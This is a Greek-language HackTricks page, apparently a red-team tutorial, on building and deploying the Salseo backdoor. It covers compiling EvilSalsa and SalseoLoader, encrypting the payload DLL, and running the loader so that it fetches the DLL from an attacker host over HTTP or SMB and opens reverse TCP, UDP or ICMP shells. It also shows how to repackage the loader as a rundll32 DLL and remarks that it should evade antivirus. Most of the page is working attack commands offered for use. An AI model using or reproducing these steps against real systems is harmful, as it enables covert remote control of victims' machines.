Salseo

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Red Team του HackTricks στο AWS)!

Άλλοι τρόποι υποστήριξης του HackTricks:

Συντάσσοντας τα δυαδικά αρχεία

Κατεβάστε τον πηγαίο κώδικα από το github και συντάξτε τα EvilSalsa και SalseoLoader. Θα χρειαστεί να έχετε εγκατεστημένο το Visual Studio για να συντάξετε τον κώδικα.

Συντάξτε αυτά τα έργα για την αρχιτεκτονική του παραθύρου όπου θα τα χρησιμοποιήσετε (Αν τα Windows υποστηρίζουν x64, συντάξτε τα για αυτές τις αρχιτεκτονικές).

Μπορείτε να επιλέξετε την αρχιτεκτονική μέσα στο Visual Studio στην αριστερή καρτέλα "Build" στο "Platform Target".

(**Αν δεν μπορείτε να βρείτε αυτές τις επιλογές, πατήστε στην "Project Tab" και μετά στις "Ιδιότητες <Ονομασίας Έργου>")

Στη συνέχεια, συντάξτε και τα δύο έργα (Build -> Build Solution) (Μέσα στα logs θα εμφανιστεί η διαδρομή του εκτελέσιμου αρχείου):

Προετοιμασία της Παρασκήνιας Πόρτας

Καταρχάς, θα πρέπει να κωδικοποιήσετε το EvilSalsa.dll. Για να το κάνετε αυτό, μπορείτε να χρησιμοποιήσετε το σενάριο python encrypterassembly.py ή μπορείτε να συντάξετε το έργο EncrypterAssembly:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

Τώρα έχετε ό,τι χρειάζεστε για να εκτελέσετε όλο το Salseo: το κωδικοποιημένο EvilDalsa.dll και το δυαδικό του SalseoLoader.

Μεταφορτώστε το δυαδικό SalseoLoader.exe στη μηχανή. Δεν πρέπει να ανιχνευθεί από κανένα AV...

Εκτέλεση της πίσω πόρτας

Λήψη εναλλακτικού κέλυφους TCP (λήψη κωδικοποιημένου dll μέσω HTTP)

Θυμηθείτε να ξεκινήσετε ένα nc ως ακροατής αντίστροφου κελύφους και ένα διακομιστή HTTP για να εξυπηρετήσετε το κωδικοποιημένο evilsalsa.

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Λήψη ενός αντίστροφου κέλυφους UDP (λήψη κωδικοποιημένου dll μέσω SMB)

Θυμηθείτε να ξεκινήσετε ένα nc ως ακροατή αντίστροφου κελύφους και ένα διακομιστή SMB για να εξυπηρετήσει το κωδικοποιημένο evilsalsa (impacket-smbserver).

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Λήψη ενός αντίστροφου κελύφους ICMP (κωδικοποιημένο dll ήδη μέσα στο θύμα)

Αυτή τη φορά χρειάζεστε ένα ειδικό εργαλείο στον πελάτη για να λάβετε το αντίστροφο κελύφους. Λήψη: https://github.com/inquisb/icmpsh

Απενεργοποίηση απαντήσεων ICMP:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

Εκτέλεση του πελάτη:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

Μέσα στο θύμα, ας εκτελέσουμε το πράγμα salseo:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Συναρμολόγηση του SalseoLoader ως DLL εξαγωγής κύριας συνάρτησης

Ανοίξτε το έργο SalseoLoader χρησιμοποιώντας το Visual Studio.

Προσθέστε πριν από την κύρια συνάρτηση: [DllExport]

Εγκατάσταση DllExport για αυτό το έργο

Εργαλεία --> Διαχείριση πακέτων NuGet --> Διαχείριση πακέτων NuGet για τη λύση...

Αναζήτηση για το πακέτο DllExport (χρησιμοποιώντας την καρτέλα Περιήγηση), και πατήστε Εγκατάσταση (και αποδεχτείτε το αναδυόμενο παράθυρο)

Στο φάκελο του έργου σας εμφανίζονται τα αρχεία: DllExport.bat και DllExport_Configure.bat

Απεγκατάσταση DllExport

Πατήστε Απεγκατάσταση (ναι, είναι περίεργο αλλά εμπιστευτείτε με, είναι απαραίτητο)

Έξοδος από το Visual Studio και εκτέλεση του DllExport_configure

Απλά βγείτε από το Visual Studio

Στη συνέχεια, πηγαίνετε στον φάκελο του SalseoLoader και εκτελέστε το DllExport_Configure.bat

Επιλέξτε x64 (αν πρόκειται να το χρησιμοποιήσετε μέσα σε ένα x64 box, όπως στην περίπτωσή μου), επιλέξτε System.Runtime.InteropServices (μέσα στο Namespace for DllExport) και πατήστε Εφαρμογή

Ανοίξτε ξανά το έργο με το Visual Studio

Το [DllExport] δε θα πρέπει πλέον να εμφανίζεται ως σφάλμα

Κατασκευή της λύσης

Επιλέξτε Τύπος Εξόδου = Βιβλιοθήκη κλάσεων (Έργο --> Ιδιότητες SalseoLoader --> Εφαρμογή --> Τύπος εξόδου = Βιβλιοθήκη κλάσεων)

Επιλέξτε πλατφόρμα x64 (Έργο --> Ιδιότητες SalseoLoader --> Κατασκευή --> Στόχος πλατφόρμας = x64)

Για να κατασκευάσετε τη λύση: Κατασκευή --> Κατασκευή Λύσης (Μέσα στην κονσόλα εξόδου θα εμφανιστεί η διαδρομή του νέου DLL)

Δοκιμάστε το παραγόμενο Dll

Αντιγράψτε και επικολλήστε το Dll όπου θέλετε να το δοκιμάσετε.

Εκτελέστε:

rundll32.exe SalseoLoader.dll,main

Αν δεν εμφανίζεται κάποιο σφάλμα, πιθανότατα έχετε ένα λειτουργικό DLL!!

Λήψη κέλυφους χρησιμοποιώντας το DLL

Μην ξεχάσετε να χρησιμοποιήσετε ένα HTTP server και να ορίσετε ένα nc listener

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

Εντολή

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

Last updated